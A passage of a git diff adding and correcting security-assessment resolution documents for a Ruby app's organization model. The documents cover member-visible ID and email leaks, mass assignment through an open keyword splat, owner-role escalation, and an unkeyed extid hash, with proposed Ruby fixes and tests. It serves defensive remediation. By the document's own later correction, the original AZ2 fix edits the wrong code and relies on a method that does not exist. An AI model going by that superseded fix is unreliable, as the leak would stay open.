+`member`) holds — so the dump audience is "every member," not "every admin/owner."
+
+Leaked fields (`lib/onetime/models/organization/features/safe_dump_fields.rb`):
+
+```ruby
+base.safe_dump_field :identifier, ->(obj) { obj.identifier }  # :17 == objid
+base.safe_dump_field :objid                                   # :18 internal UUIDv7 PK
+...
+base.safe_dump_field :owner_id                                # :22 owner's Customer custid
+base.safe_dump_field :created_by                              # :27 creator's custid
+base.safe_dump_field :contact_email                           # :28 tenant PII
+base.safe_dump_field :billing_email                           # :29 tenant PII
+```
+
+- `objid`/`identifier` (`:17-18`) defeat the documented Opaque Identifier Pattern (`organization.rb:10-30`),
+  whose entire purpose is to keep the internal UUID out of URLs/APIs. Combined with **AZ5** (plain-SHA-256
+  extid derivation), a member who learns the `objid` can recompute the `extid`.
+- `owner_id`/`created_by` (`:22,:27`) expose the owner/creator's internal customer custid to any member.
+- `contact_email`/`billing_email` (`:28-29`) are tenant-internal PII exposed to every member, not just
+  billing/org admins.
+
+CONFIRMED-good: `stripe_customer_id`, `stripe_subscription_id`, `email_hash`, and `subscription_status` are
+*not* in this list (compare `lib/onetime/models/organization/features/with_organization_billing.rb`), so the
+hard billing identifiers are already withheld.
+
+## Root cause
+
+A single `safe_dump` field map serves all audiences. Familia's `safe_dump` is an allowlist, but the
+allowlist was authored for the owner/admin console view and reused unchanged for the member-facing
+`get_organization` read. There is no role/entitlement-aware projection: the same field set ships to a plain
+member, an admin, and an owner.
+
+## Prescribed resolution
+
+Stop emitting internal IDs from `safe_dump` entirely, and gate contact/billing PII behind the entitlement
+that already governs org/billing management. Two layers:
+
+### Implementation steps
+
+1. **Remove internal IDs from the dump unconditionally** (no audience needs the UUID; the public `extid` is
+   already present at `:19`):
+
+   ```ruby
+   # safe_dump_fields.rb — delete these two lines
+   base.safe_dump_field :identifier, ->(obj) { obj.identifier }   # :17
+   base.safe_dump_field :objid                                    # :18
+   ```
+
+   `extid` (`:19`) remains the public reference; `find_by_extid` already resolves it. This also re-closes the
+   AZ5 derivation chain (no objid in the response means nothing to feed the SHA-256/HMAC).
+
+2. **Demote owner custid to the public extid** (or drop it). Frontends that show "owned by" should reference
+   the owner by `extid`, never the internal custid:
+
+   ```ruby
+   # Replace raw custid fields with a resolved, public-safe owner reference, or remove entirely.
+   base.safe_dump_field :owner_extid, ->(org) {
+     Onetime::Customer.load(org.owner_id)&.extid   # public ID, not custid
+   }
+   # Drop :owner_id and :created_by from the member-facing dump.
+   ```
+
+   If a numeric/string owner custid is genuinely needed by an admin console, expose it only in the
+   role-aware projection below — not in the default dump.
+
+3. **Gate contact/billing emails by entitlement at the serialization boundary.** Add a role-aware serializer
+   the logic class calls, instead of one flat `safe_dump`:
+
+   ```ruby
+   # apps/api/organizations/logic/organizations/get_organization.rb
+   def success_data
+     dump = @organization.safe_dump   # now ID-free, PII-free (member-safe baseline)
+     if entitlement_in?(@organization, 'manage_org') || entitlement_in?(@organization, 'manage_billing')
+       dump[:contact_email] = @organization.contact_email
+       dump[:billing_email] = @organization.billing_email
+     end
+     { record: dump }
+   end
+   ```
+
+   Add a non-raising `entitlement_in?(org, ent)` helper next to `require_entitlement_in!`
+   (`lib/onetime/logic/base.rb:271`) that returns a boolean instead of raising (it can wrap the same
+   `membership.can?` check). Remove `:contact_email`/`:billing_email` from the base `safe_dump` list so the
+   member-facing default never carries them.
+
+4. **Review `entitlements`/`limits` (`:41-51`).** These expose the org-level capability set, which is broader
+   than the caller's own `can?` set. Confirm the frontend gates features on the *membership* entitlements
+   (returned with the membership), not the org entitlements; if it does not, scope these to admin/owner too.
+   *Confirm first:* whether removing them breaks the member dashboard's feature-gating before changing.
+
+### Alternatives considered
+
+- **Keep objid but rely on AZ5's HMAC:** rejected. Even with a keyed extid, the internal UUID has no place
+  in an API response — it violates the codebase's own opaque-ID doctrine and aids correlation across logs.
+- **One flat dump, drop PII for everyone:** simpler, but owners/billing admins legitimately need to see the
+  org's contact/billing email in the console. The role-aware projection serves both audiences correctly.
+
+## Test / verification
+
+Add to `apps/api/organizations/spec/logic/organizations/get_organization_spec.rb`:
+1. **Member dump:** plain member calls `get_organization` → response has `extid`, has **no** `objid`,
+   `identifier`, `owner_id`, `created_by`, `contact_email`, or `billing_email`.
+2. **Owner/billing dump:** owner (or `manage_billing` holder) → response includes `contact_email`/
+   `billing_email`, still **no** `objid`/`identifier`.
+3. **AZ5 linkage regression:** assert no `objid`/`identifier`/UUID-shaped value appears anywhere in the
+   serialized org for any role.
+4. **Migration/consumer check:** snapshot the member-facing JSON keys and diff against any frontend type
+   definitions to catch consumers that read the removed fields.
+
+## Effort & risk
+
+- **Effort:** Low–Medium — field-list edits plus a small role-aware serializer and the `entitlement_in?`
+  helper.
+- **Back-compat / migration:** removing `objid`/`identifier`/`owner_id`/`created_by` is an API response
+  change. Grep frontend + SDK consumers for these keys first; the assessment notes `owner_id`/`created_by`
+  are kept "for backward-compatible JSON consumers during the deprecation window"
+  (`safe_dump_fields.rb:23-26`), so coordinate the removal with that window (or expose `owner_extid` as the
+  replacement before deleting `owner_id`).
+- **Risk:** Low for the security goal; medium for consumer breakage — covered by the JSON-key snapshot test.

--- a/docs/security/assessment-2026-06-22/resolutions/AZ2-organization-safe-dump-minimization.md
+++ b/docs/security/assessment-2026-06-22/resolutions/AZ2-organization-safe-dump-minimization.md
@@ -1,12 +1,35 @@
 # AZ2 — Organization safe_dump leaks internal IDs, owner custid, and contact/billing PII
 
-- **Severity:** Medium — **CONFIRMED**
-- **Status:** Proposed fix
+- **Severity:** Medium — **CONFIRMED** (but see correction: `owner_id` in the title is already stripped)
+- **Status:** Proposed fix — **superseded by re-verification correction (2026-06-24) below**
 - **Affects default config?** Yes (any active org member can read the org via `get_organization`)
 - **Related:** finding 02 F2; AZ5 (extid derivable once objid leaks); AZ6 (same class for Receipt)
 - **Primary files:** `lib/onetime/models/organization/features/safe_dump_fields.rb`,
   `apps/api/organizations/logic/organizations/get_organization.rb`,
   `lib/onetime/models/organization.rb` (opaque-ID doc, `:10-30`)
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §3b/§6).**
+> **Wrong sink.** The prescription below edits `safe_dump_fields.rb` and a `get_organization.rb#success_data`
+> method — but the member-facing serialization actually happens in `serialize_organization` at
+> `apps/api/organizations/logic/base.rb:61-80`, and the depicted `success_data` method does not exist.
+> Editing `safe_dump_fields.rb` alone will not remove the leak.
+>
+> **Headline overstates.** `owner_id` (in the doc title) is **already stripped**: `serialize_organization`
+> substitutes `owner_extid` (`:72`) then `record.delete(:owner_id)` (`:74`). The residual member-visible leak
+> rides `created_by`, `contact_email`, `billing_email` (none stripped) plus the objid alias
+> (`record[:id] = record[:objid]`, `:66`).
+>
+> **Corrected fix — edit `serialize_organization` (`apps/api/organizations/logic/base.rb:61-80`):**
+> - delete `:identifier` and `:created_by` from the member baseline;
+> - keep the existing `owner_id` deletion (`:74`);
+> - **defer `:objid` removal** behind a coordinated migration — `record[:id] = objid` (`:66`) is a hard
+>   runtime dependency (frontend zod contract + the `O-Organization-ID` interceptor), so it cannot be dropped
+>   unilaterally;
+> - **nil-out (do not delete)** `contact_email`/`billing_email` for non-admins — the contract requires the
+>   key to be present;
+> - author the missing non-raising `entitlement_in?` helper (the body references it; it does not yet exist);
+> - gate the `members[]` array — `get_organization.rb:54-60` emits `member.objid` + email, a second leak the
+>   body does not address.
 
 ## Problem (recap)
 

--- a/docs/security/assessment-2026-06-22/resolutions/AZ3-organization-create-allowlist.md
+++ b/docs/security/assessment-2026-06-22/resolutions/AZ3-organization-create-allowlist.md
@@ -1,12 +1,14 @@
 # AZ3 — Organization.create! open `**` splat enables mass assignment
 
-- **Severity:** Medium — **NEEDS-VALIDATION** (latent; sole current caller passes fixed args)
-- **Status:** Proposed fix
+- **Severity:** Medium — **NEEDS-VALIDATION** (latent; multiple callers pass `is_default:` via the splat)
+- **Status:** Proposed fix — **corrected 2026-06-24** (allowlist now includes `is_default`; `planid`
+  citation fixed; see `RE-VERIFICATION-2026-06-24-independent.md` §4/§6)
 - **Affects default config?** Yes (organizations are created on every signup), but **not exploitable today**
 - **Related:** finding 02 F3; AZ8 (same class of defect in `Customer.create!`); AZ4 (model-layer hardening)
 - **Primary files:** `lib/onetime/models/organization.rb` (`create!`, `:421-437`; sensitive fields `:65-72`
   and `with_organization_billing.rb`),
-  `apps/api/organizations/logic/organizations/create_organization.rb` (sole caller)
+  `apps/api/organizations/logic/organizations/create_organization.rb` (primary caller; other splat callers
+  pass `is_default:` — see Problem)
 
 ## Problem (recap)
 
@@ -28,15 +30,19 @@ def create!(display_name, owner_customer, contact_email = nil, **)
 `owner_id`/`created_by` are pinned from the trusted `owner_customer` positional arg, so those are safe. The
 risk is the bare `**`: Familia's `initialize_with_keyword_args` sets **any declared field** from kwargs with
 no field-level allowlist (assessment §5, `familia/.../horreum.rb:446`). The Organization declares sensitive
-plain fields — `planid` (`:87`, billing tier), `is_default` (`:70`), `archived_at`/`archived_comment`
-(`:71-72`), plus the billing fields from `with_organization_billing` (`stripe_customer_id`,
-`stripe_subscription_id`, `subscription_status`, `complimentary`). If **any** caller ever forwards
-request params into that splat, an attacker could set their own plan tier, mark an org `complimentary`, or
-inject a Stripe id.
+plain fields — `archived_at`/`archived_comment` (`:71-72`), plus the billing fields from
+`with_organization_billing` — `planid` (`with_organization_billing.rb:34`, billing tier; **not**
+`organization.rb:87`, which is only the init default), `stripe_customer_id`, `stripe_subscription_id`,
+`subscription_status`, `complimentary`. If **any** caller ever forwards request params into that splat, an
+attacker could set their own plan tier, mark an org `complimentary`, or inject a Stripe id.
+(`is_default` is also splat-settable but is a benign workspace flag legitimate callers set at create time —
+see the allowlist below.)
 
-*Confirm first:* the only production caller today is `create_organization.rb`, which passes a fixed
-positional set (no raw params forwarded), so this is currently a latent over-posting surface, not a live
-vulnerability. Validate there is no other `Organization.create!(...**params)` sink before sizing the work as
+*Confirm first:* no production caller forwards a **raw request-params hash** into the splat, so this is a
+latent over-posting surface, not a live vulnerability. (Re-verification found multiple callers — 3 production
++ 6 spec — that do pass `is_default: true` via the splat, e.g. `lazy_organization_creation_spec.rb`; those
+pass fixed literals, not request params, and are the reason `is_default` is allowlisted below.) Validate
+there is no `Organization.create!(...**params)` sink forwarding untrusted input before sizing the work as
 exploitable.
 
 ## Root cause
@@ -59,10 +65,12 @@ code paths (billing webhook, standalone materialization), never by create-time k
 
    ```ruby
    # lib/onetime/models/organization.rb
-   # Attributes a caller may set at creation. Everything else (planid, is_default,
-   # Stripe ids, complimentary, subscription_status, archived_*) is owned by
-   # trusted internal flows, NOT create-time input.
-   CREATE_ALLOWED_ATTRS = %i[display_name description].freeze
+   # Attributes a caller may set at creation. is_default is a benign workspace flag
+   # (delete-protection / same-customer domain-SSO) that legitimate splat callers set
+   # at create time, so it is allowlisted. Everything else (planid, Stripe ids,
+   # complimentary, subscription_status, archived_*) is owned by trusted internal
+   # flows, NOT create-time input.
+   CREATE_ALLOWED_ATTRS = %i[display_name description is_default].freeze
 
    def create!(display_name, owner_customer, contact_email = nil, **extra)
      raise Onetime::Problem, 'Owner required' if owner_customer.nil?
@@ -96,10 +104,12 @@ code paths (billing webhook, standalone materialization), never by create-time k
    `materialize_standalone_entitlements!` / the billing webhook assign the real plan. Creation input must not
    set it.
 
-2. Confirm the sole caller still works: `create_organization.rb` passes a fixed positional set, so it lands
-   on the empty/allowlisted path unchanged.
+2. Confirm the callers still work: `create_organization.rb` and the other splat callers that pass
+   `display_name`/`description`/`is_default: true` now land on the allowlisted path unchanged. Because the
+   filter is fail-closed, any caller passing `is_default` would have raised had it been left off the
+   allowlist — hence its inclusion.
 
-3. **Defense-in-depth at the field level (optional but recommended):** mark `planid`, `is_default`, the
+3. **Defense-in-depth at the field level (optional but recommended):** mark `planid`, the
    Stripe fields, `complimentary`, and `subscription_status` as not-externally-assignable so even a future
    bulk setter cannot reach them. If Familia supports a per-field guard, register these; otherwise document
    them in the model header as "internal-only — set via billing/materialization paths only," mirroring the
@@ -121,7 +131,7 @@ Add to the Organization model spec:
    if you chose drop-silently, the created org has `planid == 'free_v1'`).
 2. **Billing fields blocked:** `complimentary: true`, `stripe_customer_id: 'cus_x'`,
    `subscription_status: 'active'` are all rejected/ignored.
-3. **Allowed attrs pass:** `description:` is accepted and persisted.
+3. **Allowed attrs pass:** `description:` and `is_default: true` are accepted and persisted.
 4. **Caller regression:** existing `create_organization_spec.rb` continues to pass unchanged (no behavior
    change for the legitimate path).
 

--- a/docs/security/assessment-2026-06-22/resolutions/AZ3-organization-create-allowlist.md
+++ b/docs/security/assessment-2026-06-22/resolutions/AZ3-organization-create-allowlist.md
@@ -1,0 +1,134 @@
+# AZ3 — Organization.create! open `**` splat enables mass assignment
+
+- **Severity:** Medium — **NEEDS-VALIDATION** (latent; sole current caller passes fixed args)
+- **Status:** Proposed fix
+- **Affects default config?** Yes (organizations are created on every signup), but **not exploitable today**
+- **Related:** finding 02 F3; AZ8 (same class of defect in `Customer.create!`); AZ4 (model-layer hardening)
+- **Primary files:** `lib/onetime/models/organization.rb` (`create!`, `:421-437`; sensitive fields `:65-72`
+  and `with_organization_billing.rb`),
+  `apps/api/organizations/logic/organizations/create_organization.rb` (sole caller)
+
+## Problem (recap)
+
+`Organization.create!` forwards an open keyword splat straight into `new`:
+
+```ruby
+# lib/onetime/models/organization.rb:421-437
+def create!(display_name, owner_customer, contact_email = nil, **)
+  ...
+  org = new(
+    display_name: display_name,
+    owner_id: owner_customer.custid,      # fixed from trusted positional arg — safe
+    created_by: owner_customer.custid,    # fixed — safe
+    contact_email: contact_email,
+    **,                                   # OPEN SPLAT — any declared field becomes settable
+  )
+```
+
+`owner_id`/`created_by` are pinned from the trusted `owner_customer` positional arg, so those are safe. The
+risk is the bare `**`: Familia's `initialize_with_keyword_args` sets **any declared field** from kwargs with
+no field-level allowlist (assessment §5, `familia/.../horreum.rb:446`). The Organization declares sensitive
+plain fields — `planid` (`:87`, billing tier), `is_default` (`:70`), `archived_at`/`archived_comment`
+(`:71-72`), plus the billing fields from `with_organization_billing` (`stripe_customer_id`,
+`stripe_subscription_id`, `subscription_status`, `complimentary`). If **any** caller ever forwards
+request params into that splat, an attacker could set their own plan tier, mark an org `complimentary`, or
+inject a Stripe id.
+
+*Confirm first:* the only production caller today is `create_organization.rb`, which passes a fixed
+positional set (no raw params forwarded), so this is currently a latent over-posting surface, not a live
+vulnerability. Validate there is no other `Organization.create!(...**params)` sink before sizing the work as
+exploitable.
+
+## Root cause
+
+The model boundary trusts its callers instead of enforcing its own invariant. `create!` is the single
+chokepoint for org creation, yet it accepts an unbounded attribute set. Familia's `guard_allowed_fields!`
+only blocks *undeclared* fields (assessment §5, `persistence.rb:761`); it does **not** protect declared
+sensitive fields like `planid`/`complimentary`. The only thing standing between a request and a
+plan/billing override is caller discipline.
+
+## Prescribed resolution
+
+Replace the open `**` with an explicit allowlist of attributes a creator may set, and reject (or ignore)
+everything else at the model boundary. Plan, billing, and lifecycle fields must be set by trusted internal
+code paths (billing webhook, standalone materialization), never by create-time kwargs.
+
+### Implementation steps
+
+1. Define the creator-settable allowlist and filter the splat inside `create!`:
+
+   ```ruby
+   # lib/onetime/models/organization.rb
+   # Attributes a caller may set at creation. Everything else (planid, is_default,
+   # Stripe ids, complimentary, subscription_status, archived_*) is owned by
+   # trusted internal flows, NOT create-time input.
+   CREATE_ALLOWED_ATTRS = %i[display_name description].freeze
+
+   def create!(display_name, owner_customer, contact_email = nil, **extra)
+     raise Onetime::Problem, 'Owner required' if owner_customer.nil?
+
+     display_name = display_name.to_s.strip
+     raise Onetime::Problem, 'Display name required' if display_name.empty?
+
+     contact_email = contact_email.to_s.strip
+     contact_email = nil if contact_email.empty?
+
+     # Fail-closed: reject any attribute not on the allowlist rather than
+     # silently dropping it, so a forwarded params hash surfaces loudly in tests.
+     rejected = extra.keys.map(&:to_sym) - CREATE_ALLOWED_ATTRS
+     unless rejected.empty?
+       raise Onetime::Problem, "Disallowed organization attributes: #{rejected.join(', ')}"
+     end
+     permitted = extra.slice(*CREATE_ALLOWED_ATTRS)
+
+     org = new(
+       display_name: display_name,
+       owner_id: owner_customer.custid,
+       created_by: owner_customer.custid,
+       contact_email: contact_email,
+       **permitted,
+     )
+     # ... unchanged ...
+   end
+   ```
+
+   Note `planid` is intentionally excluded: `init` defaults it to `'free_v1'` (`:86-89`) and
+   `materialize_standalone_entitlements!` / the billing webhook assign the real plan. Creation input must not
+   set it.
+
+2. Confirm the sole caller still works: `create_organization.rb` passes a fixed positional set, so it lands
+   on the empty/allowlisted path unchanged.
+
+3. **Defense-in-depth at the field level (optional but recommended):** mark `planid`, `is_default`, the
+   Stripe fields, `complimentary`, and `subscription_status` as not-externally-assignable so even a future
+   bulk setter cannot reach them. If Familia supports a per-field guard, register these; otherwise document
+   them in the model header as "internal-only — set via billing/materialization paths only," mirroring the
+   existing `created_by` "immutable audit field" convention (`:68`).
+
+### Alternatives considered
+
+- **Silently drop unknown keys (`slice` only, no raise):** safer than the splat, but a forwarded params hash
+  would pass silently. The fail-closed `raise` turns any future mis-wiring into a loud test failure, which is
+  the long-term-safe choice for a security boundary.
+- **Rely on caller discipline + a lint/grep gate:** rejected. The assessment already documents the latent
+  risk; the model is the right place to enforce its own invariant once, rather than re-auditing every future
+  caller.
+
+## Test / verification
+
+Add to the Organization model spec:
+1. **Mass-assignment rejection:** `Organization.create!('Acme', owner, planid: 'enterprise_v1')` raises (or,
+   if you chose drop-silently, the created org has `planid == 'free_v1'`).
+2. **Billing fields blocked:** `complimentary: true`, `stripe_customer_id: 'cus_x'`,
+   `subscription_status: 'active'` are all rejected/ignored.
+3. **Allowed attrs pass:** `description:` is accepted and persisted.
+4. **Caller regression:** existing `create_organization_spec.rb` continues to pass unchanged (no behavior
+   change for the legitimate path).
+
+## Effort & risk
+
+- **Effort:** Low — localized to `create!`, plus a model spec.
+- **Back-compat:** none broken if the allowlist matches what the real caller sends (`display_name`,
+  `description`). Verify no test or seed passes `planid`/billing fields positionally before merging.
+- **Risk:** Low. Behavior is unchanged for the production path; the change only constrains a currently-unused
+  attack surface.

--- a/docs/security/assessment-2026-06-22/resolutions/AZ4-change-role-reject-owner.md
+++ b/docs/security/assessment-2026-06-22/resolutions/AZ4-change-role-reject-owner.md
@@ -1,0 +1,141 @@
+# AZ4 — change_role! accepts `owner` at the model layer (escalation guard lives only in one validator)
+
+- **Severity:** Medium — **NEEDS-VALIDATION** (no current endpoint reaches it with `owner`)
+- **Status:** Proposed fix
+- **Affects default config?** Yes (role management is a default org feature)
+- **Related:** finding 02 F4; AZ1 (RemoveMember entitlement gate); `update_member_role.rb` validator
+- **Primary files:** `lib/onetime/models/organization_membership.rb` (`change_role!`, `:258-274`;
+  `ROLE_ENTITLEMENTS`, `:102-106`),
+  `apps/api/organizations/logic/members/update_member_role.rb` (`validate_role_change!`, `:129-167`)
+
+## Problem (recap)
+
+`OrganizationMembership#change_role!` validates only that the new role is a known role-entitlement key:
+
+```ruby
+# organization_membership.rb:258-262
+def change_role!(new_role)
+  new_role = new_role.to_s
+  unless ROLE_ENTITLEMENTS.key?(new_role)
+    raise Onetime::Problem, "Invalid role: ... Must be one of: #{ROLE_ENTITLEMENTS.keys.join(', ')}"
+  end
+  ...
+```
+
+`ROLE_ENTITLEMENTS` (`:102-106`) has keys `'owner'`, `'admin'`, `'member'`. So the model **rejects
+`'colonel'`** (not a key) but **accepts `'owner'`**. The only thing preventing a promotion to `owner`
+through the role-change flow is the endpoint validator:
+
+```ruby
+# update_member_role.rb:29  VALID_ROLES = %w[member admin]
+# update_member_role.rb:159-167
+return unless @new_role == 'owner'
+raise_form_error(error_key: 'api.organizations.members.errors.cannot_promote_to_owner', ...)
+```
+
+The escalation guard ("you cannot make someone an owner via this endpoint") lives in exactly **one place**.
+Any future caller of `change_role!('owner')` — a bulk-migration script, a colonel tool, an SSO
+auto-provisioning path, a refactor that adds a second role endpoint — would silently mint a second owner
+with no last-owner accounting and no ownership-transfer semantics.
+
+*Confirm first:* there is currently no production caller that passes `'owner'` to `change_role!` other than
+through `update_member_role`, which blocks it. There is also **no `transfer_ownership!`** method in the
+codebase today (grep confirms zero references), so ownership change has no first-class, guarded path.
+
+## Root cause
+
+`change_role!` treats "owner" as just another assignable role, but owner is special: it carries
+`OWNER_ENTITLEMENTS` (`manage_billing`, `manage_org`, `manage_sso`, etc., `:90-100`) and there must always be
+exactly one accountable owner. Promotion to owner and demotion of the last owner are *ownership-transfer*
+operations, not ordinary role edits — yet the model exposes them through the generic path and relies on a UI
+validator to forbid them.
+
+## Prescribed resolution
+
+Make `change_role!` reject `owner` (and any future privileged role) at the model layer, and route ownership
+changes through a dedicated, guarded `transfer_ownership!`. The model becomes the authoritative guard so the
+protection no longer depends on a single endpoint validator.
+
+### Implementation steps
+
+1. Add an explicit assignable-role allowlist and reject `owner` in `change_role!`:
+
+   ```ruby
+   # lib/onetime/models/organization_membership.rb
+   # Roles assignable via the ordinary role-change path. 'owner' is excluded:
+   # ownership is a single accountable seat and changes only via transfer_ownership!.
+   ASSIGNABLE_ROLES = %w[member admin].freeze
+
+   def change_role!(new_role)
+     new_role = new_role.to_s
+     unless ASSIGNABLE_ROLES.include?(new_role)
+       raise Onetime::Problem,
+         "Role '#{new_role}' cannot be set via change_role!. " \
+         "Assignable roles: #{ASSIGNABLE_ROLES.join(', ')}. " \
+         "Use transfer_ownership! to change ownership."
+     end
+     return true if role == new_role
+     self.role = new_role
+     raise Onetime::Problem, "Materialization failed for role change to #{new_role}" unless materialize_for_role!
+     true
+   end
+   ```
+
+   This rejects both `'owner'` and `'colonel'` (and anything else), so the model is fail-closed regardless of
+   what `ROLE_ENTITLEMENTS` happens to contain. `ROLE_ENTITLEMENTS` still legitimately includes `owner` for
+   the *entitlement-materialization* lookup (`compute_entitlements_from_role`); only *assignment* is
+   restricted.
+
+2. Add a first-class, guarded ownership transfer (currently missing entirely):
+
+   ```ruby
+   # Promote `target` to owner and demote the current owner to admin, atomically,
+   # enforcing the "exactly one owner" invariant. Last-owner protection lives here.
+   def self.transfer_ownership!(organization, current_owner_membership, target_membership)
+     raise Onetime::Problem, 'Current owner mismatch' unless current_owner_membership.owner?
+     raise Onetime::Problem, 'Target must be an active member' unless target_membership.active?
+     # ... within an atomic_write / lock on the org:
+     #   target_membership.role = 'owner'; target_membership.materialize_for_role!
+     #   current_owner_membership.role = 'admin'; current_owner_membership.materialize_for_role!
+     # Re-check post-condition: org has exactly one active owner membership.
+   end
+   ```
+
+   Mirror the atomicity discipline used elsewhere (`Familia::Lock` / `atomic_write`, as in C1) so a
+   concurrent transfer cannot leave zero or two owners. The dedicated method is where the **last-owner /
+   single-owner** invariant is enforced, instead of being scattered across validators.
+
+3. Keep `update_member_role.rb`'s `VALID_ROLES`/`cannot_promote_to_owner` guard as a second layer (it now
+   produces a friendly form error before the model would raise a generic one). Defense-in-depth: endpoint
+   validator + model guard.
+
+### Alternatives considered
+
+- **Reject only `'owner'`, keep `ROLE_ENTITLEMENTS.key?` for the rest:** weaker — still relies on
+  `ROLE_ENTITLEMENTS` never gaining a future privileged key. An explicit positive allowlist
+  (`ASSIGNABLE_ROLES`) is strictly fail-closed.
+- **Allow owner promotion in `change_role!` but add a last-owner check there:** rejected — conflates two
+  semantics (demotion vs. transfer) and still lacks the demote-the-old-owner half of a transfer. A dedicated
+  `transfer_ownership!` is the principled long-term shape.
+
+## Test / verification
+
+Add to `lib/onetime/models/spec` (or the membership spec) and `update_member_role_spec.rb`:
+1. **Model guard:** `membership.change_role!('owner')` raises; `change_role!('colonel')` raises;
+   `change_role!('admin')`/`'member'` succeed and re-materialize.
+2. **Endpoint still blocks owner:** PATCH role=`owner` → existing `cannot_promote_to_owner` form error
+   (unchanged).
+3. **Transfer invariant:** `transfer_ownership!` promotes target, demotes old owner, and leaves exactly one
+   active owner; concurrent transfers do not produce zero/two owners (drive with the lock/atomic harness).
+4. **Last-owner protection:** attempting to demote the only owner via any path is rejected.
+
+## Effort & risk
+
+- **Effort:** Medium — small `change_role!` change is trivial; the new `transfer_ownership!` with atomicity
+  and last-owner accounting is the bulk of the work. If ownership transfer is out of scope for this pass,
+  ship step 1 (reject `owner`) alone — it closes the escalation surface — and track `transfer_ownership!`
+  separately.
+- **Back-compat:** any internal script that relied on `change_role!('owner')` must move to
+  `transfer_ownership!`. Grep confirms none exist today.
+- **Risk:** Low for step 1 (no current caller passes `owner`); Medium for the transfer method since it
+  touches the single-owner invariant — cover with the concurrency test.

--- a/docs/security/assessment-2026-06-22/resolutions/AZ5-organization-extid-keyed-hmac.md
+++ b/docs/security/assessment-2026-06-22/resolutions/AZ5-organization-extid-keyed-hmac.md
@@ -1,0 +1,132 @@
+# AZ5 — Organization extid uses plain SHA-256, not a keyed HMAC
+
+- **Severity:** Medium — **NEEDS-VALIDATION** (defense-in-depth; compounded by AZ2 leaking objid)
+- **Status:** Proposed fix
+- **Affects default config?** Yes (every org has an extid; no `secret:` is configured)
+- **Related:** finding 02 F5; AZ2 (objid leak removes the "objid is secret" assumption);
+  the verifiable-id approach used for secrets (F12)
+- **Primary files:** `lib/onetime/models/organization.rb:46` (`feature :external_identifier`),
+  `familia/lib/familia/features/external_identifier.rb:300-346` (derivation),
+  `familia/lib/familia/verifiable_identifier.rb:45-94` (the keyed-secret pattern to mirror)
+
+## Problem (recap)
+
+The Organization extid is declared without a `secret:` option:
+
+```ruby
+# lib/onetime/models/organization.rb:46
+feature :external_identifier, format: 'on%<id>s'
+```
+
+In Familia's derivation, the absence of a configured `secret:` selects the **plain SHA-256** branch:
+
+```ruby
+# familia/lib/familia/features/external_identifier.rb:323-336
+secret = options[:secret]
+secret = secret.call if secret.respond_to?(:call)
+random_bytes =
+  if secret && !secret.to_s.empty?
+    OpenSSL::HMAC.digest('SHA256', secret.to_s, normalized_hex)[0, 16]   # keyed: unforgeable
+  else
+    Digest::SHA256.digest(normalized_hex)[0, 16]                          # OTS today: derivable
+  end
+```
+
+So `extid = format('on%<id>s', base36(SHA256(objid)[0,16]))` — a **deterministic, unkeyed** function of the
+objid. Anyone who learns an org's `objid` can recompute its `extid` offline with no secret. Familia's own
+comment flags exactly this: "Without a secret, a plain SHA-256 still removes the MT weakness and the 64-bit
+truncation" (`external_identifier.rb:319-322`) — i.e. it is *better than the old MT seed*, but it is **not
+unforgeable**.
+
+This is normally low-impact because objids are internal. But **AZ2 leaks `objid`/`identifier` in the org
+safe_dump** (`organization/features/safe_dump_fields.rb:17-18`), so the precondition is satisfied today: a
+member who reads the org sees the objid and can derive the extid for *other* orgs whose objids leak (logs,
+error messages, cross-references). The two findings compound.
+
+*Confirm first:* whether the deployment can tolerate **extid rotation**. Switching from SHA-256 to HMAC
+changes the derived extid for every existing org, which breaks already-issued extid URLs and the
+`extid_lookup` index unless migrated (see migration below). Validate the operational appetite before
+choosing eager vs. lazy rotation.
+
+## Root cause
+
+The extid was set up for *opacity* (non-sequential, non-enumerable) but not *unforgeability*. The design
+assumes the objid stays secret, but provides no keyed binding so that, even if the objid leaks, the public
+id cannot be reproduced. Secrets already use the stronger model — `Familia::VerifiableIdentifier` requires
+`VERIFIABLE_ID_HMAC_SECRET` and **refuses a committed default** (`verifiable_identifier.rb:45-53`) — but the
+organization extid was never brought up to that bar.
+
+## Prescribed resolution
+
+Configure a keyed HMAC `secret:` for the Organization `external_identifier`, sourced from an environment
+variable with no committed default, mirroring the secrets `VERIFIABLE_ID_HMAC_SECRET` discipline. Use a
+callable so the model still loads when the env var is absent (CI/tooling) and fails loudly only at first
+derivation.
+
+### Implementation steps
+
+1. Add a keyed secret to the feature declaration, resolved lazily:
+
+   ```ruby
+   # lib/onetime/models/organization.rb:46
+   feature :external_identifier,
+     format: 'on%<id>s',
+     secret: -> { ENV.fetch('EXTID_HMAC_SECRET') }   # no committed default; raises if unset
+   ```
+
+   The callable form is explicitly supported (`external_identifier.rb:324-330`): "Allow a callable secret
+   ... so the value resolves lazily at first derivation ... a missing secret still raises loudly here — where
+   it matters." This matches the fail-closed posture of `VerifiableIdentifier.secret_key`
+   (`verifiable_identifier.rb:46-53`).
+
+2. **Operations:** generate and set `EXTID_HMAC_SECRET` (`openssl rand -hex 32`) in every environment that
+   creates or resolves org extids. Document it alongside `VERIFIABLE_ID_HMAC_SECRET`. Consider a single
+   shared key vs. a distinct one per id-domain; distinct keys are cleaner (compromise of one does not affect
+   the other) but require managing two secrets.
+
+3. **Migration (the load-bearing part).** Existing orgs have SHA-256-derived extids stored in the
+   `extid_lookup` index. Turning on HMAC changes the derivation, so choose a strategy:
+   - **Recommended — persist extid, stop re-deriving:** if extid is stored on the record and looked up via
+     `extid_lookup`, the new `secret:` only affects *newly minted* extids; existing orgs keep their stored
+     extid and resolve unchanged. *Confirm first* that derivation runs once at create and the value is
+     persisted (not recomputed on every access) — read `external_identifier.rb` around the `extid`
+     accessor/`extid_lookup` to verify, because the answer dictates whether old URLs survive.
+   - **Eager rotation:** a one-time housekeeping chore recomputes the HMAC extid for every org, rewrites
+     `extid_lookup`, and (optionally) keeps the old extid as an alias for a deprecation window so existing
+     URLs keep resolving. Heavier; only needed if extids are recomputed-on-read.
+
+4. **Apply the same fix to AZ2 in tandem:** removing `objid`/`identifier` from the org safe_dump (AZ2) closes
+   the *practical* derivation chain even before the key rotates, so land AZ2 first — it is the cheap, no-key
+   mitigation — and add the HMAC as the durable defense-in-depth layer.
+
+### Alternatives considered
+
+- **Rely on AZ2 alone (hide the objid):** necessary but insufficient — objids leak through logs, support
+  tools, and cross-model references. The keyed extid means an objid leak no longer yields the public id.
